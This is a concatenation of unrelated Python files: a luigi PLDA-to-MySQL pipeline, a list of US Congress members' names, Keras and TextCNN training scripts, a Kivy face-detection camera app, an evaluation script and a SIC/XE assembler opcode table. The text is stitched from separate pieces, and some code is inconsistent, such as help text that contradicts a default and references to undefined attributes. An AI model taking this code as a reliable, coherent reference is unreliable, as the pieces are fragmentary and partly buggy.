cmd = cmd % (self.mf, job_num, self.mpi_plda,
self.topic_num, self.alpha, self.input()[0].fn,
self.plda_model_tmp, self.total_iter)
os.system(cmd)
if os.path.exists(self.mf):
os.remove(self.mf)
if os.path.exists(self.plda_model_tmp):
os.rename(self.plda_model_tmp, self.output().fn)
class PLDA2Mysql(luigi.Task):
conf = luigi.Parameter()
def __init__(self, *args, **kwargs):
luigi.Task.__init__(self, *args, **kwargs)
parser = SafeConfigParser()
parser.read(self.conf)
root = parser.get("basic", "root")
self.model_view = "%s/data/temp/plda.model.view" % root
self.host = parser.get("mysql", "host")
self.db = parser.get("mysql", "db")
self.user = parser.get("mysql", "user")
self.passwd = parser.get("mysql", "password")
def requires(self):
return [PLDA(self.conf)]
def output(self):
return None
def run(self):
plda_model_view(self.input()[0].fn, self.model_view)
import_model_view(self.model_view, self.host, self.db, self.user, self.passwd)
os.remove(self.model_view)
if __name__ == "__main__":
luigi.run()
|
names = ["Sherrod Brown",
"Maria Cantwell",
"Benjamin Cardin",
"Thomas Carper",
"Robert Casey",
"Dianne Feinstein",
"Amy Klobuchar",
"Robert Menendez",
"Bernard Sanders",
"Debbie Stabenow",
"Jon Tester",
"Sheldon Whitehouse",
"John Barrasso",
"Roger Wicker",
"Lamar Alexander",
"Susan Collins",
"John Cornyn",
"Richard Durbin",
"Michael Enzi",
"Lindsey Graham",
"James Inhofe",
"Mitch McConnell",
"Jeff Merkley",
"Jack Reed",
"James Risch",
"Pat Roberts",
"Jeanne Shaheen",
"Tom Udall",
"Mark Warner",
"Kirsten Gillibrand",
"Christopher Coons",
"Joe Manchin III",
"Robert Aderholt",
"Justin Amash",
"Tammy Baldwin",
"Karen Bass",
"Michael Bennet",
"Gus Bilirakis",
"Rob Bishop",
"Sanford Bishop",
"Marsha Blackburn",
"Earl Blumenauer",
"Richard Blumenthal",
"Roy Blunt",
"John Boozman",
"Kevin Brady",
"Mo Brooks",
"Vern Buchanan",
"Larry Bucshon",
"Michael Burgess",
"Richard Burr",
"Butterfield",
"Ken Calvert",
"Shelley Moore Capito",
"Andre Carson",
"John Carter",
"Bill Cassidy",
"Kathy Castor",
"Steve Chabot",
"Judy Chu",
"David Cicilline",
"Yvette Clarke",
"Lacy Clay",
"Emanuel Cleaver",
"James Clyburn",
"Steve Cohen",
"Tom Cole",
"Michael Conaway",
"Gerald Connolly",
"Jim Cooper",
"Jim Costa",
"Joe Courtney",
"Mike Crapo",
"Eric Crawford",
"Henry Cuellar",
"Elijah Cummings",
"Danny Davis",
"Susan Davis",
"Peter DeFazio",
"Diana DeGette",
"Rosa DeLauro",
"Scott DesJarlais",
"Theodore Deutch",
"Mario Diaz-Balart",
"Lloyd Doggett",
"Michael Doyle",
"Jeff Duncan",
"Eliot Engel",
"Anna Eshoo",
"Charles Fleischmann",
"Bill Flores",
"Jeff Fortenberry",
"Virginia Foxx",
"Marcia Fudge",
"John Garamendi",
"Cory Gardner",
"Bob Gibbs",
"Louie Gohmert",
"Paul Gosar",
"Kay Granger",
"Chuck Grassley",
"Sam Graves",
"Tom Graves",
"Al Green",
"Morgan Griffith",
"Raul Grijalva",
"Brett Guthrie",
"Andy Harris",
"Vicky Hartzler",
"Alcee Hastings",
"Martin Heinrich",
"Jaime Herrera Beutler",
"Brian Higgins",
"James Himes",
"Mazie Hirono",
"John Hoeven",
"Steny Hoyer",
"Bill Huizenga",
"Duncan Hunter",
"Johnny Isakson",
"Sheila Jackson Lee",
"Bill Johnson",
"Eddie Bernice Johnson",
"Henry Johnson",
"Ron Johnson",
"Jim Jordan",
"Marcy Kaptur",
"William Keating",
"Mike Kelly",
"Ron Kind",
"Peter King",
"Steve King",
"Adam Kinzinger",
"Doug Lamborn",
"James Langevin",
"James Lankford",
"Rick Larsen",
"John Larson",
"Robert Latta",
"Patrick Leahy",
"Barbara Lee",
"Mike Lee",
"John Lewis",
"Daniel Lipinski",
"David Loebsack",
"Zoe Lofgren",
"Billy Long",
"Nita Lowey",
"Frank Lucas",
"Blaine Luetkemeyer",
"Ben Ray Lujan",
"Stephen Lynch",
"Carolyn Maloney",
"Kenny Marchant",
"Edward Markey",
"Doris Matsui",
"Kevin McCarthy",
"Michael McCaul",
"Tom McClintock",
"Betty McCollum",
"James McGovern",
"Patrick McHenry",
"David McKinley",
"Cathy McMorris Rodgers",
"Jerry McNerney",
"Gregory Meeks",
"Gwen Moore",
"Jerry Moran",
"Lisa Murkowski",
"Christopher Murphy",
"Patty Murray",
"Jerrold Nadler",
"Grace Napolitano",
"Richard Neal",
"Eleanor Holmes Norton",
"Devin Nunes",
"Pete Olson",
"Steven Palazzo",
"Frank Pallone",
"Bill Pascrell",
"Rand Paul",
"Nancy Pelosi",
"Ed Perlmutter",
"Gary Peters",
"Collin Peterson",
"Chellie Pingree",
"Rob Portman",
"Bill Posey",
"David Price",
"Mike Quigley",
"Tom Reed",
"Cedric Richmond",
"Martha Roby",
"David Roe",
"Harold Rogers",
"Mike Rogers",
"Lucille Roybal-Allard",
"Marco Rubio",
"Dutch Ruppersberger",
"Bobby Rush",
"Tim Ryan",
"Gregorio Kilili Camacho Sablan",
"John Sarbanes",
"Steve Scalise",
"Janice Schakowsky",
"Adam Schiff",
"Kurt Schrader",
"Charles Schumer",
"David Schweikert",
"Austin Scott",
"David Scott",
"Robert Scott",
"Tim Scott",
"James Sensenbrenner",
"Jose Serrano",
"Terri Sewell",
"Richard Shelby",
"Brad Sherman",
"John Shimkus",
"Michael Simpson",
"Albio Sires",
"Adam Smith",
"Adrian Smith",
"Christopher Smith",
"Jackie Speier",
"Steve Stivers",
"Linda Sanchez",
"Bennie Thompson",
"Mike Thompson",
"Glenn Thompson",
"Mac Thornberry",
"John Thune",
"Scott Tipton",
"Paul Tonko",
"Patrick Toomey",
"Michael Turner",
"Fred Upton",
"Chris Van Hollen",
"Nydia Velazquez",
"Peter Visclosky",
"Tim Walberg",
"Greg Walden",
"Debbie Wasserman Schultz",
"Maxine Waters",
"Daniel Webster",
"Peter Welch",
"Joe Wilson",
"Frederica Wilson",
"Robert Wittman",
"Steve Womack",
"Rob Woodall",
"Ron Wyden",
"John Yarmuth",
"Don Young",
"Todd Young",
"Mark Amodei",
"Suzanne Bonamici",
"Suzan DelBene",
"Thomas Massie",
"Donald Payne",
"Brian Schatz",
"Bill Foster",
"Dina Titus",
"Tom Cotton",
"Kyrsten Sinema",
"Doug LaMalfa",
"Jared Huffman",
"Ami Bera",
"Paul Cook",
"Eric Swalwell",
"Julia Brownley",
"Tony Cardenas",
"Raul Ruiz",
"Mark Takano",
"Alan Lowenthal",
"Juan Vargas",
"Scott Peters",
"Ted Yoho",
"Lois Frankel",
"Doug Collins",
"Tulsi Gabbard",
"Tammy Duckworth",
"Rodney Davis",
"Cheri Bustos",
"Jackie Walorski",
"Susan Brooks",
"Andy Barr",
"Elizabeth Warren",
"Joseph Kennedy III",
"Angus King",
"Daniel Kildee",
"Ann Wagner",
"Steve Daines",
"Richard Hudson",
"Mark Meadows",
"George Holding",
"Kevin Cramer",
"Deb Fischer",
"Ann Kuster",
"Grace Meng",
"Hakeem Jeffries",
"Sean Patrick Maloney",
"Chris Collins",
"Brad Wenstrup",
"Joyce Beatty",
"David Joyce",
"Markwayne Mullin",
"Scott Perry",
"Matt Cartwright",
"Tom Rice",
"Ted Cruz",
"Randy Weber",
"Joaquin Castro",
"Roger Williams",
"Marc Veasey",
"Filemon Vela",
"Chris Stewart",
"Tim Kaine",
"Derek Kilmer",
"Denny Heck",
"Mark Pocan",
"Robin Kelly",
"Jason Smith",
"Cory Booker",
"Katherine Clark",
"Bradley Byrne",
"Donald Norcross",
"Alma Adams",
"Gary Palmer",
"French Hill",
"Bruce Westerman",
"Ruben Gallego",
"Mark DeSaulnier",
"Pete Aguilar",
"Ted Lieu",
"Norma Torres",
"Ken Buck",
"Earl Carter",
"Jody Hice",
"Barry Loudermilk",
"Rick Allen",
"Mike Bost",
"Ralph Lee Abraham",
"Garret Graves",
"Seth Moulton",
"John Moolenaar",
"Debbie Dingell",
"Brenda Lawrence",
"Tom Emmer",
"David Rouzer",
"Bonnie Watson Coleman",
"Lee Zeldin",
"Kathleen Rice",
"Elise Stefanik",
"John Katko",
"Brendan Boyle",
"John Ratcliffe",
"Will Hurd",
"Brian Babin",
"Donald Beyer",
"Stacey Plaskett",
"Dan Newhouse",
"Glenn Grothman",
"Alexander Mooney",
"Aumua Amata Coleman Radewagen",
"Dan Sullivan",
"David Perdue",
"Joni Ernst",
"Thom Tillis",
"Mike Rounds",
"Mark Walker",
"Ben Sasse",
"Trent Kelly",
"Darin LaHood",
"Warren Davidson",
"James Comer",
"Dwight Evans",
"Kamala Harris",
"John Kennedy",
"Margaret Wood Hassan",
"Catherine Cortez Masto",
"Bradley Scott Schneider",
"Tom O’Halleran",
"Andy Biggs",
"Ro Khanna",
"Jimmy Panetta",
"Salud Carbajal",
"Nanette Diaz Barragan",
"Luis Correa",
"Lisa Blunt Rochester",
"Matt Gaetz",
"Neal Dunn",
"John Rutherford",
"Al Lawson",
"Stephanie Murphy",
"Darren Soto",
"Val Butler Demings",
"Charlie Crist",
"Brian Mast",
"Francis Rooney",
"Drew Ferguson IV",
"Raja Krishnamoorthi",
"Jim Banks",
"Trey Hollingsworth",
"Roger Marshall",
"Clay Higgins",
"Mike Johnson",
"Anthony Brown",
"Jamie Raskin",
"Jack Bergman",
"Paul Mitchell",
"Ted Budd",
"Don Bacon",
"Josh Gottheimer",
"Jacky Rosen",
"Thomas Suozzi",
"Adriano Espaillat",
"Brian Fitzpatrick",
"Lloyd Smucker",
"Jenniffer Gonzalez-Colon",
"David Kustoff",
"Vicente Gonzalez",
"Jodey Arrington",
"Donald McEachin",
"Pramila Jayapal",
"Mike Gallagher",
"Liz Cheney",
"Ron Estes",
"Greg Gianforte",
"Ralph Norman",
"Jimmy Gomez",
"John Curtis",
"Doug Jones",
"Tina Smith",
"Cindy Hyde-Smith",
"Conor Lamb",
"Debbie Lesko",
"Michael Cloud",
"Troy Balderson",
"Kevin Hern",
"Joseph Morelle",
"Mary Gay Scanlon",
"Susan Wild",
"Ed Case",
"Steven Horsford",
"Ann Kirkpatrick",
"Greg Stanton",
"Josh Harder",
"TJ Cox",
"Katie Hill",
"Gilbert Ray Cisneros",
"Katie Porter",
"Harley Rouda",
"Mike Levin",
"Joe Neguse",
"Jason Crow",
"Jahana Hayes",
"Michael Waltz",
"Ross Spano",
"Gregory Steube",
"Debbie Mucarsel-Powell",
"Donna Shalala",
"Lucy McBath",
"Michael San Nicolas",
"Abby Finkenauer",
"Cynthia Axne",
"Russ Fulcher",
"Jesus Garcia",
"Sean Casten",
"Lauren Underwood",
"James Baird",
"Greg Pence",
"Steve Watkins",
"Sharice Davids",
"Lori Trahan",
"Ayanna Pressley",
"David Trone",
"Elissa Slotkin",
"Andy Levin",
"Haley Stevens",
"Rashida Tlaib",
"Jim Hagedorn",
"Angie Craig",
"Dean Phillips",
"Ilhan Omar",
"Pete Stauber",
"Michael Guest",
"Kelly Armstrong",
"Chris Pappas",
"Jefferson Van Drew",
"Andy Kim",
"Tom Malinowski",
"Mikie Sherrill",
"Debra Haaland",
"Xochitl Torres Small",
"Susie Lee",
"Max Rose",
"Alexandria Ocasio-Cortez",
"Antonio Delgado",
"Anthony Brindisi",
"Anthony Gonzalez",
"Kendra Horn",
"Madeleine Dean",
"Chrissy Houlahan",
"Daniel Meuser",
"John Joyce",
"Guy Reschenthaler",
"Joe Cunningham",
"William Timmons IV",
"Dusty Johnson",
"Tim Burchett",
"John Rose",
"Mark Green",
"Dan Crenshaw",
"Van Taylor",
"Lance Gooden",
"Ron Wright",
"Lizzie Fletcher",
"Veronica Escobar",
"Chip Roy",
"Sylvia Garcia",
"Colin Allred",
"Ben McAdams",
"Elaine Luria",
"Denver Riggleman",
"Ben Cline",
"Abigail Davis Spanberger",
"Jennifer Wexton",
"Kim Schrier",
"Bryan Steil",
"Carol Miller",
"Rick Scott",
"Mike Braun",
"Josh Hawley",
"Mitt Romney",
"Martha McSally",
"Jared Golden",
"Fred Keller",
"Dan Bishop",
"Gregory Murphy"]
|
# Importing the libraries
import tensorflow as tf
from keras.preprocessing.image import ImageDataGenerator
# Generating images in required format for the Training set
train_datagen = ImageDataGenerator(rescale = 1./255,
shear_range = 0.2,
zoom_range = 0.2,
horizontal_flip = True)
# Generating images in required format for the Test set
test_datagen = ImageDataGenerator(rescale = 1./255)
# Creating the Training set
training_set = train_datagen.flow_from_directory('trainingSet',
color_mode='grayscale',
target_size = (28, 28),
batch_size = 32,
class_mode = 'categorical')
# Creating the Test set
test_set = test_datagen.flow_from_directory('testSet',
color_mode='grayscale',
target_size = (28, 28),
batch_size = 32)
# Importing libraries that are required for a CNN
from keras.models import Sequential
from keras.layers import Conv2D, MaxPool2D, Flatten, Dense
# Initialising the CNN
cnn = Sequential()
# Convolution Layer 1
cnn.add(Conv2D(filters=32, kernel_size=3, padding="same", activation="relu", input_shape=[28, 28, 1]))
# Pooling Layer 1
cnn.add(MaxPool2D(pool_size=2, strides=2, padding='valid'))
# Convolution Layer 2
cnn.add(Conv2D(filters=32, kernel_size=3, padding="same", activation="relu"))
cnn.add(MaxPool2D(pool_size=2, strides=2, padding='valid'))
# Flattening of layers of CNN
cnn.add(Flatten())
# Full Connection stage of CNN
cnn.add(Dense(units=128, activation='relu'))
# Output Layer
cnn.add(Dense(units=10, activation='softmax'))
# Compiling the CNN
cnn.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])
# Training the CNN on the Training set and evaluating it on the Test set
cnn.fit_generator(training_set,
steps_per_epoch = 64,
epochs = 10,
validation_data = test_set,
validation_steps = 64)
# Saving the trained CNN for future use
cnn.save('mnist.model')
|
import argparse
import logging
import os
parser = argparse.ArgumentParser(description='For Socket Connection')
parser.add_argument('--host', metavar='HOST', type=str, default='localhost', help='a string for a host address')
parser.add_argument('--port', metavar='PORT', type=int, default=9999, help='a integer for a port number')
parser.add_argument('--buff', metavar='BUFF', type=int, default=1024, help='a buffer size for a socket connection')
parser.add_argument('--path_home', metavar='PATH_HOME', type=str, default=os.getenv('HOME'), help='Path of the home directory')
logger = logging.getLogger('Socket Logger')
logger.setLevel(logging.DEBUG) # DEBUG>INFO>WARNING>ERROR>CRITICAL
formatter = logging.Formatter('[%(levelname)s|%(filename)s:%(lineno)s]: %(message)s')
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
logger.addHandler(streamHandler)
def get_parser():
return parser.parse_args()
def get_logger():
return logger
|
from __future__ import print_function
from . import smile
def main():
print(smile())
|
# coding:utf-8
import time
from kivy.app import App
from kivy.uix.image import Image
from kivy.clock import Clock
from kivy.graphics.texture import Texture
from kivy.uix.boxlayout import BoxLayout
import cv2
import pybind_example
cascPath = "haarcascade_frontalface_default.xml"
faceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + cascPath)
WINDOW_SIZE = 10
class DetectLayout(BoxLayout):
def capture(self):
'''
Function to capture the images and give them the names
according to their captured time and date.
'''
camera = self.ids['camera']
timestr = time.strftime("%Y%m%d_%H%M%S")
filename = 'IMG_{}.png'.format(timestr)
camera.export_to_png(filename)
print("Captured as {}".format(filename))
class KivyCamera(Image):
def __init__(self, fps=30, **kwargs):
super(KivyCamera, self).__init__(**kwargs)
self.capture = cv2.VideoCapture(0)
Clock.schedule_interval(self.update, 1.0 / fps)
self.actual_fps = []
def detect_faces(self, frame):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(
gray,
scaleFactor=1.2,
minNeighbors=5,
minSize=(30, 30),
)
# Draw a rectangle around the faces
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
return frame
def frame_to_texture(self, frame):
# convert it to texture
buf1 = cv2.flip(frame, 0)
buf = buf1.tostring()
image_texture = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr')
image_texture.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')
return image_texture
def update_fps(self):
self.actual_fps.append(Clock.get_fps())
stats = pybind_example.rolling_stats(self.actual_fps, WINDOW_SIZE)
fpses = [stat[0] for stat in stats]
self.fps = str(self.actual_fps[-1])
def update(self, dt):
ret, frame = self.capture.read()
if not ret:
return
if self.detect:
self.detect_faces(frame)
if self.green_mode:
frame[:, :, 2] = 0
frame[:, :, 0] = 0
self.update_fps()
# display image from the texture
self.texture = self.frame_to_texture(frame)
class CamApp(App):
def build(self):
self.layout = DetectLayout()
return self.layout
def on_stop(self):
#without this, app will not exit even if the window is closed
self.layout.ids['camera'].capture.release()
if __name__ == '__main__':
CamApp().run()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import ctypes
import glob
import os
import re
import sys
from multiprocessing import Array
from multiprocessing import Process
from multiprocessing import Queue
from os.path import basename
from os.path import exists
import matplotlib.pyplot as plt
import numpy as np
import six
import cv2 as cv
from utils.evaluation import relax_precision
from utils.evaluation import relax_recall
if 'linux' in sys.platform:
import matplotlib
matplotlib.use('Agg')
parser = argparse.ArgumentParser()
parser.add_argument('--map_dir', type=str)
parser.add_argument('--result_dir', type=str)
parser.add_argument('--channel', type=int, default=3)
parser.add_argument('--offset', type=int, default=8)
parser.add_argument('--pad', type=int, default=24) # (64 / 2) - (16 / 2)
parser.add_argument('--steps', type=int, default=256)
parser.add_argument('--relax', type=int, default=3)
parser.add_argument('--n_thread', type=int, default=8)
args = parser.parse_args()
print(args)
result_dir = args.result_dir
n_iter = int(result_dir.split('_')[-1])
label_dir = args.map_dir
result_fns = sorted(glob.glob('%s/*.npy' % result_dir))
n_results = len(result_fns)
eval_dir = '%s/evaluation_%d' % (result_dir, n_iter)
all_positive_base = Array(
ctypes.c_double, n_results * args.channel * args.steps)
all_positive = np.ctypeslib.as_array(all_positive_base.get_obj())
all_positive = all_positive.reshape((n_results, args.channel, args.steps))
all_prec_tp_base = Array(
ctypes.c_double, n_results * args.channel * args.steps)
all_prec_tp = np.ctypeslib.as_array(all_prec_tp_base.get_obj())
all_prec_tp = all_prec_tp.reshape((n_results, args.channel, args.steps))
all_true_base = Array(
ctypes.c_double, n_results * args.channel * args.steps)
all_true = np.ctypeslib.as_array(all_true_base.get_obj())
all_true = all_true.reshape((n_results, args.channel, args.steps))
all_recall_tp_base = Array(
ctypes.c_double, n_results * args.channel * args.steps)
all_recall_tp = np.ctypeslib.as_array(all_recall_tp_base.get_obj())
all_recall_tp = all_recall_tp.reshape((n_results, args.channel, args.steps))
def makedirs(dname):
if not exists(dname):
os.makedirs(dname)
def get_pre_rec(positive, prec_tp, true, recall_tp, steps):
pre_rec = []
breakeven = []
for t in six.moves.range(steps):
if positive[t] < prec_tp[t] or true[t] < recall_tp[t]:
sys.exit('calculation is wrong')
pre = float(prec_tp[t]) / positive[t] if positive[t] > 0 else 0
rec = float(recall_tp[t]) / true[t] if true[t] > 0 else 0
pre_rec.append([pre, rec])
if pre != 1 and rec != 1 and pre > 0 and rec > 0:
breakeven.append([pre, rec])
pre_rec = np.asarray(pre_rec)
if len(breakeven) > 0:
breakeven = np.asarray(breakeven)
breakeven_pt = np.abs(breakeven[:, 0] - breakeven[:, 1])
breakeven_pt = breakeven_pt.argmin()
breakeven_pt = breakeven[breakeven_pt]
else:
breakeven_pt = [0.0, 0.0]
return pre_rec, breakeven_pt
def draw_pre_rec_curve(pre_rec, breakeven_pt):
plt.clf()
plt.plot(pre_rec[:, 0], pre_rec[:, 1])
plt.plot(breakeven_pt[0], breakeven_pt[1],
'x', label='breakeven recall: %f' % (breakeven_pt[1]))
plt.ylabel('recall')
plt.xlabel('precision')
plt.ylim([0.0, 1.1])
plt.xlim([0.0, 1.1])
plt.legend(loc='lower left')
plt.grid(linestyle='--')
def worker_thread(result_fn_queue):
while True:
i, result_fn = result_fn_queue.get()
if result_fn is None:
break
img_id = basename(result_fn).split('pred_')[-1]
img_id, _ = os.path.splitext(img_id)
if '.' in img_id:
img_id = img_id.split('.')[0]
if len(re.findall('_', img_id)) > 1:
img_id = '_'.join(img_id.split('_')[1:])
out_dir = '%s/%s' % (eval_dir, img_id)
makedirs(out_dir)
print(img_id)
label = cv.imread('%s/%s.tif' %
(label_dir, img_id), cv.IMREAD_GRAYSCALE)
pred = np.load(result_fn)
label = label[args.pad + args.offset - 1:
args.pad + args.offset - 1 + pred.shape[0],
args.pad + args.offset - 1:
args.pad + args.offset - 1 + pred.shape[1]]
cv.imwrite('%s/label_%s.png' % (out_dir, img_id), label * 125)
print('pred_shape:', pred.shape)
for c in six.moves.range(args.channel):
for t in six.moves.range(0, args.steps):
threshold = 1.0 / args.steps * t
pred_vals = np.array(
pred[:, :, c] >= threshold, dtype=np.int32)
label_vals = np.array(label, dtype=np.int32)
if args.channel > 1:
label_vals = np.array(label == c, dtype=np.int32)
all_positive[i, c, t] = np.sum(pred_vals)
all_prec_tp[i, c, t] = relax_precision(
pred_vals, label_vals, args.relax)
all_true[i, c, t] = np.sum(label_vals)
all_recall_tp[i, c, t] = relax_recall(
pred_vals, label_vals, args.relax)
pre_rec, breakeven_pt = get_pre_rec(
all_positive[i, c], all_prec_tp[i, c],
all_true[i, c], all_recall_tp[i, c], args.steps)
draw_pre_rec_curve(pre_rec, breakeven_pt)
plt.savefig('%s/pr_curve_%d.png' % (out_dir, c))
np.save('%s/pre_rec_%d' % (out_dir, c), pre_rec)
cv.imwrite('%s/pred_%d.png' % (out_dir, c), pred[:, :, c] * 255)
print(img_id, c, breakeven_pt)
print('thread finished')
if __name__ == '__main__':
result_fn_queue = Queue()
workers = [Process(target=worker_thread,
args=(result_fn_queue,)) for i in range(args.n_thread)]
for w in workers:
w.start()
[result_fn_queue.put((i, fn)) for i, fn in enumerate(result_fns)]
[result_fn_queue.put((None, None)) for _ in range(args.n_thread)]
for w in workers:
w.join()
print('all finished')
all_positive = np.sum(all_positive, axis=0)
all_prec_tp = np.sum(all_prec_tp, axis=0)
all_true = np.sum(all_true, axis=0)
all_recall_tp = np.sum(all_recall_tp, axis=0)
for c in six.moves.range(args.channel):
pre_rec, breakeven_pt = get_pre_rec(
all_positive[c], all_prec_tp[c],
all_true[c], all_recall_tp[c], args.steps)
draw_pre_rec_curve(pre_rec, breakeven_pt)
plt.savefig('%s/pr_curve_%d.png' % (eval_dir, c))
np.save('%s/pre_rec_%d' % (eval_dir, c), pre_rec)
print(breakeven_pt)
|
import itertools
p = list(map("".join, itertools.permutations("123456789")))
for i in range(1000, 9999):
a = i * 1
b = i * 2
if str(a)+str(b) in p:
print(a, b)
|
import os
import sys
import time
import argparse
import torch
import numpy as np
from torchtext import data
from torchtext import vocab
#from tensorboardX import SummaryWriter
import model
import TrainModel
import DatasetPreprocess
parser = argparse.ArgumentParser(description='TextCNN text classifier')
# Model hyper parameters
parser.add_argument('-lr', type=float, default=0.1, help='initial learning rate [default: 0.001]')
parser.add_argument('-epochs', type=int, default=256, help='number of epochs for train [default: 256]')
parser.add_argument('-trainBatchSize', type=int, default=128, help='batch size for training [default: 128]')
parser.add_argument('-dropout', type=float, default=0.5, help='the probability for dropout [default: 0.5]')
parser.add_argument('-maxNorm', type=float, default=3.0, help='l2 constraint of parameters [default: 3.0]')
parser.add_argument('-embeddingDim', type=int, default=300, help='number of embedding dimension [default: 128]')
parser.add_argument('-filterNum', type=int, default=100, help='number of each size of filter')
parser.add_argument('-filterSizes', type=str, default='3,4,5', help='comma-separated filter sizes to use for convolution')
parser.add_argument('-earlyStopping', type=int, default=1000, help='iteration numbers to stop without performance increasing')
# Word embedding parameters
parser.add_argument('-static', type=bool, default=True, help='whether to use static pre-trained word vectors')
parser.add_argument('-fineTuneWordEm', type=bool, default=False, help='whether to fine-tune static pre-trained word vectors')
parser.add_argument('-multichannel', type=bool, default=False, help='whether to use 2 channel of word vectors')
parser.add_argument('-logInterval', type=int, default=1, help='how many steps to wait before logging training status [default: 1]')
parser.add_argument('-valInterval', type=int, default=100, help='how many steps to wait before testing [default: 100]')
# Directories
parser.add_argument('-datasetDir', type=str, default='data/cnews/5_100', help='Directory of dataset [default: None]')
parser.add_argument('-pretrainedEmbeddingName', type=str, default='sgns.sogounews.bigram-char', help='filename of pre-trained word vectors')
parser.add_argument('-pretrainedEmbeddingPath', type=str, default='./pretrainedW2v', help='path of pre-trained word vectors')
parser.add_argument('-modelSaveDir', type=str, default='modelSaveDir', help='where to save the modelsavedir')
parser.add_argument('-modelSaveBest', type=bool, default=True, help='whether to save when get best performance')
parser.add_argument('-modelLoadFilename', type=str, default=None, help='filename of model loading [default: None]')
# Device
parser.add_argument('-device', type=int, default=0, help='device to use for iterate data, -1 mean cpu [default: -1]')
args = parser.parse_args()
###process the dataset
print('Processing dataset start...')
TEXT = data.Field()
LABEL = data.Field(sequential=False)
train_iter, dev_iter, test_iter = DatasetPreprocess.GetIterator(TEXT, LABEL, args.datasetDir, args, device = -1, repeat = False, shuffle = True)
print('Processing data done!')
#process the parameters
args.embeddingNum = len(TEXT.vocab)
args.classNum = len(LABEL.vocab.freqs) #len(LABEL.vocab)获取的值会比标签数大1,如6
print('args.embeddingNum = ', args.embeddingNum)
print('args.classNum = ', args.classNum)
print('LABEL.vocab = ', LABEL.vocab.freqs)
args.cuda = args.device != -1 and torch.cuda.is_available()
args.filterSizes = [int(size) for size in args.filterSizes.split(',')]
if args.static:
args.embeddingDim = TEXT.vocab.vectors.size()[-1]
#TEXT.vocab.vectors: [332909, 300]
args.vectors = TEXT.vocab.vectors
if args.multichannel:
args.static = True
args.nonStatic = True
###print parameters
print('Parameters:')
for attr, value in sorted(args.__dict__.items()):
if attr in {'vectors'}:
continue
print('\t{}={}'.format(attr.upper(), value))
###train
textCNN = model.TextCNN(args)
#print('args.vectors ', type(args.vectors))
#print(args.vectors)
#embeddings = np.random.random((64, 432))
#embeddings = np.asarray(embeddings, dtype=int)
#embeddings = torch.from_numpy(embeddings)
#print(input)
#with SummaryWriter(log_dir='./visualLog', comment='TextCNN') as writer:
# writer.add_graph(textCNN, (embeddings,))
#print(textCNN)
if args.modelLoadFilename:
print('\nLoading model from {}...\n'.format(args.modelLoadFilename))
textCNN.load_state_dict(torch.load(args.modelLoadFilename))
if args.cuda:
torch.cuda.set_device(args.device)
textCNN = textCNN.cuda()
try:
TrainModel.train(train_iter, dev_iter, textCNN, args)
except KeyboardInterrupt:
print('\nTraining CANCEL! \nExiting from training')
|
#!/usr/bin/python3
import sys
import os
import re
import math
opcode_table = {'add':['m', 1,'3', '18'],
'addf':['m', 1, '3', '58'],
'addr':['r', 2, '2', '90'],
'and':['m', 1,'3', '40'],
'clear':['r1', 1, '2', 'B4'],
'comp':['m',1,'3', '28'],
'compf':['m',1,'3', '88'],
'compr':['r',2,'2','A0'],
'div':['m',1,'3','24'],
'divf':['m',1,'3','64'],
'divr':['r',2,'2','9C'],
'fix':[None,0,'1','C4'],
'float':[None,0,'1','C0'],
'hio':[None,0,'1','F4'],
'j':['m',1,'3','3C'],
'jeq':['m',1,'3','30'],
'jgt':['m',1,'3','34'],
'jlt':['m',1,'3','38'],
'jsub':['m',1,'3','48'],
'lda':['m',1,'3','00'],
'ldb':['m',1,'3','68'],
'ldch':['m',1,'3','50'],
'ldf':['m',1,'3','70'],
'ldl':['m',1,'3','08'],
'lds':['m',1,'3','6C'],
'ldt':['m',1,'3','74'],
'ldx':['m',1,'3','04'],
'lps':['m',1,'3','D0'],
'mul':['m',1,'3','20'],
'mulf':['m',1,'3','60'],
'mulr':['r',2,'2','98'],
'norm':[None,0,'1','C8'],
'or':['m',1,'3','44'],
'rd':['m',1,'3','D8'],
'rmo':['r',2,'2','AC'],
'rsub':[None,0,'3','4C'],
'shiftl':['r/n',2,'2','A4'],
'shiftr':['r/n',2,'2','A8'],
'sio':[None,0,'1','F0'],
'ssk':['m',1,'3','EC'],
'sta':['m',1,'3','0C'],
'stb':['m',1,'3','78'],
'stch':['m',1,'3','54'],
'stf':['m',1,'3', '80'],
'sti':['m',1,'3','D4'],
'stl':['m',1,'3','14'],
'sts':['m',1,'3','7C'],
'stsw':['m',1,'3','E8'],
'stt':['m',1,'3','84'],
'stx':['m',1,'3','10'],
'sub':['m',1,'3','1C'],
'subf':['m',1,'3','5C'],
'subr':['r',2,'2','94'],
'svc':['n',1,'2','B0'],
'td':['m',1,'3','E0'],
'tio':[None,0, '1', 'F8'],
'tix':['m',1, '3', '2C'],
'tixr':['r1',1, '2', 'B8'],
'wd':['m',1, '3', 'DC']}
# types of operands: m, r, r/n, None
# number of operands: 0, 1, 2
registers = ['a','x', 'l', 'pc', 'sw', 'b', 's', 't', 'f']
all_objCode = []
reg_nums = [0, 1, 2, 8, 9, 3, 4, 5, 6]
directives = ['end', 'nobase', 'base', 'start', 'resw', 'resb', 'byte', 'word']
sym_tab = {}
symbols_undef = []
line_lst = []
based_holder = [False]
# based = False
#### NOTES #####
# to convert from hex, do int('hex_num', 16)
# to convert to hex, do hex(int_num)
###############
class Line:
''' A class for each line read from the input source code '''
#constructor
def __init__(self, orig, line_num, pc_ctr, label=None,mnemonic=None,comment=None, optype=None,
operand1=None, operand2=None, immediate=False, indirect=False, indexed=False,
extended=False, based=False, format_inst=None):
self.orig = orig
self.label = label
self.mnemonic = mnemonic
self.line_num = line_num
self.pc_ctr = pc_ctr
self.optype = optype
self.operand1 = operand1
self.operand2 = operand2
self.immediate = immediate
self.indirect = indirect
self._format = format_inst
self.indexed = indexed
self.extended = extended
self.based = based
self.comment = comment
def __str__(self):
return self.orig
def assemble(self):
''' returns generated machine code for instruction '''
if self._format == 1:
return opcode_table[self.mnemonic][3]
elif self._format == 2:
if self.optype == 'r':
